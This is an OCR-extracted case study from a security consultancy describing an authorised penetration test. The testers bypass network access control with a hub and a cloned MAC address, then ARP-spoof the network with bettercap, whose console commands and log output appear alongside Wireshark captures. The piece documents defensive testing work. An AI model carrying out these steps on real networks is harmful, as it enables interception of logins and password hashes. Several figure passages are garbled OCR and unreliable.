LIFARS

your digital world, secured

Case Study–
NAC bypass & ARP spoofing
To ensure the effectiveness of our client’s security implementations LIFARS frequently
conducts penetration tests evaluating their systems can hold up to real world scenarios
and stay resilient. Our cyber resiliency experts deliver calculated attacks against
systems the same way black hat hackers.
In December, our client requested that LIFARS Pen Testing Team perform an internal
black box penetration test as part of a due diligence exercise. The client, an
international financial organization with over 10000 employees and 500 IPv4
addresses, understands the risks they face on a daily basis and the importance of
meeting compliance standards. Therefore, this client requested an external black box
penetration test on their network.
The intent of this assessment was to identify weaknesses in the company’s internet
facing infrastructure and to detail how these vulnerabilities could impact the
organization.
Therefore, the team used ARP poisoning as a main target for mounting other attacks,
such as Man-in-the-middle (MiTM). This security testing effort was conducted with
emphasis on the actual state of the systems examined and no documentation to the
client was provided.

Note: All information in this case study has been modified to maintain confidentiality
of our client
PENETRATION TESTING PHASES

There are various methodologies and approaches that can be used during penetration
testing. LIFARS Pen Testing Team, follows the Penetration Testing Execution Standard
(PTES) as the basis for penetration testing execution. The main phases of PTES are
listed below.
1. Pre-engagement Interactions
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting

KEY FINDINGS

While conducting the penetration test, we discovered that the client network had
implemented Network access control (NAC). This solution is often used on corporate
networks to prevent unauthorized hosts from accessing internally systems and
services.

Bypassing Network Access Control

HUB Switch

~ [~s:1lccccl ...
- §@
~

Atta cker

lI Authenticator

•
r•1
Victim

Figure 1 NAC Bypass scheme (incogbyte.github.io)

Hardware Used

100 Mb Hub – multiport repeater and PoE injector

Steps to reproduce NAC bypass:

1. First, we had to find an authenticated host and connect it to our hub. As we

have PoE injector, we can also connect to VoIP Phone and PC.

2. After that, we connected to the hub, and start intercepting ARP frames to
identify the valid host MAC address.
 C;;>>; l >;U i<.>;i, ,,.,; . <;_ ; ; .. , , ff.
'11"1 l <lll),.1'-. 1:,,. , . II_ I i • < ,_~1, '• :--
:. l :. l J UU .:.1:.:+.1, t.. <.:'.~:o _ HI ::., :erie \ll ' t,tc, lb! l 'J, 1'>1 ,
~?~ noa~:;uc-, . . ~ c::s :o_ , ., S!l.)tr>e GO l-.. C> lb$ l i . lSl .
B l l3$:i'='i ll7' . i- c:: ; :o .;<3 i rr_,:,, , e 1-.N • ,.~~ 10. a 1.

> ~• ·• •" 'I I -I: l'..<1lo:, 1- .. •• ,.. ; ,.► (.1\11,-, ·•i 1• :• . ,.,-, ·•.t' "' , .,1, 11., ·- ol ( t-1tt h i1, :
V ~• ••.. ••• ► • II ~ -., ~ : • •• : ,_~1, 1 IJ,, 1! ~ , , . " <
I" L't ~tt r ,t 1or ; :,f r (.JJ
• • 0 •• •• • • l•3 tin : ,:;1ct ->U y .1,tn: ~cc r-: ~~ ( r>ctc -r, • cc r >utt )
• •• • • •• •"I • •• ••• •• . . •• • - -5 1, ; 1, f ,., , ;_.;,1•.,. I ,11.,:,... ,,., ( m i .. . , t ;
, ... ..... , .• ► , •: .... .. ... I
•'A.i re : : : <.~~ce_ l'J
. . . . .. 'J, . . . ... . . l-:, bit : -:.l ch ll •, ,n k .. e b ~H t H (f ,cte ri.• ~e f , uh j
. .. . . .. i . .. . .. . . . . •• - :,:; bit : l fl( ~·,.i<lu l b( c r .eH ( Jfl ic H t :,
Ty, : : ,_~., ~G~3$EI:-)
1\ A Ii • ~ : 111'6.l- "II I l >l:\-"IIV,'
(,-.l,"l,,. 1 >;,"\AH;.; ,.,. .(,-.l,"IAAfi~,
) ,•,.-J, ,,... ~.., ,, 1 ,i ; ,, .. ... ,, .. ,: ., 1 ,:, ,.. , ,,. - .. 1)

Figure 2 IP & MAC address of the victim

3. At this point, we can connect the hub to the switch, and we wait for Victim
authentication.

4. After successful authentication, we cloned the valid MAC and IP address and
connect to HUB. Now the switch does not recognize the difference between
the attacker and the PC client.

Killer E2400G1gab1tEthernet Contro ller Properti es X

Events Resources Power Management

General Advanced Driver Details

The following properties are available for this network adapter. Click
the propertyyou want to change on the left. and then select its value
on the right.

f.roperty: Value:
ARP Offload "
ECMA
Energy Efficient B hemet
Row Control
r Not Present
lntenupt Moderation
1Pv4 Checksum Offload
Jumbo Frame
Large Send Offload (1Pv4)
Large Send Offload v2 (1Pv4)
Large Send Offload v2 (1Pv6)
Max IRQ per Second
RSS Queues
V

Cancel

Figure 3 MAC address change

ARP Spoofing

ARP poisoning is when an attacker sends false ARP messages over a local area
network to link an attacker’s MAC address with the IP address of a legitimate
computer or server on the network.
Once the attacker’s MAC address is linked to an authentic IP address, the attacker
can receive anything directed to the legitimate MAC address. As a result, the attacker
can make an Man-in-the-middle attack (MiTM).

Switch

Alice
Bob IP: 10.0.0.7
IP: 10.0.0.1 MAC : [aa:aa :aa:aa :aa:aa]
MAC: [bb:bb:bb:bb:bb:bb)

Attacke r
IP 10.0.0 .3
MAC : [cc:cc:cc:cc:cc :cc]

Figure 4 Representation of ARP spoofing

We have used bettercap on Windows to launch an ARP spoofing attack.

Steps to reproduce ARP spoofing attack:

1. We need to scan the network for all hosts, using module net.recon and
net.probe.
 (! Gt ID © , 21.o.o.11•11an ... 0* Ill ID ill

2. With this newly obtained set of hosts, we can choose which specific host we
want to target. We can either use the console command or the GUI to execute
this.

From the console command we can type in the cmdlet:

Set arp.spoof.targets TARGET IP

From the GUI we can go to the IP address on the left corner, in this case it is
192.168.1.161. From the pull down menu, we can then choose add to
arp.spoof.targets

792.768.7.767 • 30:24:32 ....

Copy
\D evice\NPF_{10B87E4 E- D3D 1-4 1
Scan Ports
Add to arp.spoof.targets

3. Before starting the ARP spoofing module, we need to start net.sniff . We can
either use the console command or the GUI to execute this.

From the console command we type in the following cmdlet:

net.sniff on

From the GUI we can go to: Advanced -> net.sniff -> net.sniff.on
We have now successfully launched ARP spoofing:

0. 12:56 PM net.sniff.mdns mdn s 192.16 8.1.25 : PTR que ry for _airplay._tcp.local

0. 12:56 PM net.sniff.mdns mdns 192 .168 .1.25 : PTR que ry for _raop._tcp .local

0. 12:56 PM endpoint.new Det ected 192. 168. 1.25 84 :AD:8D:

0. 12:56 PM endpoint.lost Lost 192. 168. 1.25 84:AD:8D:

0. 12:56 PM mod.started arp.spoof

0. 12:56 PM sys.log WARNING : arp.sp oof full dup lex spoo fing enable d. if the rout er has ARP spoo fing mechanis ms. the att ack will fail.

0. 12:56 PM sys.log INFO : arp.spoof arp spoole r starte d. prob ing 3 targe ts.

Verification of ARP spoofing using Wireshark:

36776 304 . 468178 Micro-St 84 :ad: Bd ARP 6 0 192 . 168 . 1. 92 is at dB :cb:Ba
3 682 5 304.47 3401 Micro - St 84 :ad: Bd ARP 60 19 2 .168 i s at d8:cb : 8a
. 1.141
370 17 304.851396 30 : 24:32 84 :ad: Bd ARP 60 192 . 168 i s at 30:24 : 32
. 1. 161
37435 305 . 554 2 25 Micro - St 30:24 : 32 ARP 60 192 . 168 is at d8:cb : 8a
. 1. 205 (d uplicat e use of 1 92 .168 . 1.16 1 de t e cte d !)
3 7436 305. 5 54 32 8 30 : 24: 32 Mic ro - St ARP 60 19 2 . 168 is at 30: 24 : 32
. 1. 161
37437 305. 554439 Micr o-St 30 : 24 : 32 ARP 60 192 . 168 . 1. 0 is at dB:cb : Sa ( duplic ate use o f 192 . 168 . 1 . 1 6 1 det e cted!)
37439 305 . 554640 Micro - St 30 : 24 : 32 ARP 60 192 . 168 . 1. 1 is at dB :cb:Ba (duplic ate us e of 192 . 168 . 1 . 161 det e cted!)
3 7440 305. 5 54786 Micro - St B4 :a d: Bd ARP 60 192 . 168 . 1. 1 is at d8 :cb:8a

CONCLUSION

With ARP spoofing & Man-in-the-Middle (MiTM) attack we were able to sniff user login
data and critical password hashes. These attacks were only successful because we
were able to bypass NAC.

REPORTING

Key issues listed in this case study, and many others, were put into the final report.
The issues were identified at risk levels: low, medium, high and critical. The executive
summary provided a brief summary of vulnerabilities discovered during this
assessment broken down by category. Many of these issues were presented graphically
with recommendations given for resolution of each.

Worried about Attacks Against Your Organization?

For Incident Response and Threat Intelligence consultancy Contact LIFARS
Today Email:contact@lifars.com | Call us at:(212) 222-7061